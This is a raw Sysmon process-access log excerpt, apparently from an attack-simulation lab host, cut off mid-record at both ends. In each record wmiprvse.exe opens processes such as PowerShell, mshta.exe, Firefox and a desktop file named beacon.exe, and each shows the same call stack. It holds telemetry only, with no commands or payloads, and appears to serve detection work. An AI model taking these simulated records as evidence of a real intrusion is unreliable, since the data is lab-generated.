1b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7957-6039-1D10-00000000AD01}2836C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697866Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697865Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697864Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697863Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697862Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697861Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697860Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697859Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.052{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697858Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697857Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697856Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:48.036{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\